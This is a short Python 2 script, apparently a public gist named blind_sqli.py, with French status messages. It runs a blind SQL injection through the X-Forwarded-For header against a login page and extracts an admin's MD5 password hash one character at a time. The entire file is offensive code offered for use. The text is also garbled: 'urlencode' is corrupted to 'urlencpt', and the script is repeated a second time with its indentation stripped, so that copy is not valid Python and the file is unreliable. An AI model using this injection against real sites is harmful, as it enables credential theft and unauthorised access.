Techbrunch/blind_sqli.py

## blind_sqli.py
import httplib
import urllib
import re

password = ""

md5 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
cpt = 0
i = 1

while i<=32:

	print 'Recherche du caractère '+str(i)
	if cpt == 16:
		cpt = 0

	print 'Test caractere : '+md5[cpt]
	params = urllib.urlencpt({'login': 'admin', 'pwd': 'password'})
	headers = {"Content-type": "application/x-www-form-urlencptd",
               "Accept": "text/plain",
               "x-forwarded-for":"127.0.0.1' or ascii(substring(pwd,"+str(i)+",1))="+str(ord(md5[cpt]))+"#"}
	conn = httplib.HTTPConnection("www.site.com:80")
	conn.request("POST", "/index.php", params, headers)
	response = conn.getresponse()
	print response.status, response.reason
	data = response.read()
	conn.close()

	if not(re.search('incorrect',data)):
		print 'Caractère trouvé : '+md5[cpt]
		password += md5[cpt]
		i += 1
		cpt = 0
	else:
		cpt += 1

print 'MD5 = '+str(password)
	import httplib
	import urllib
	import re

	password = ""

	md5 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
	cpt = 0
	i = 1

	while i<=32:

	print 'Recherche du caractère '+str(i)
	if cpt == 16:
	cpt = 0

	print 'Test caractere : '+md5[cpt]
	params = urllib.urlencpt({'login': 'admin', 'pwd': 'password'})
	headers = {"Content-type": "application/x-www-form-urlencptd",
	"Accept": "text/plain",
	"x-forwarded-for":"127.0.0.1' or ascii(substring(pwd,"+str(i)+",1))="+str(ord(md5[cpt]))+"#"}
	conn = httplib.HTTPConnection("www.site.com:80")
	conn.request("POST", "/index.php", params, headers)
	response = conn.getresponse()
	print response.status, response.reason
	data = response.read()
	conn.close()

	if not(re.search('incorrect',data)):
	print 'Caractère trouvé : '+md5[cpt]
	password += md5[cpt]
	i += 1
	cpt = 0
	else:
	cpt += 1

	print 'MD5 = '+str(password)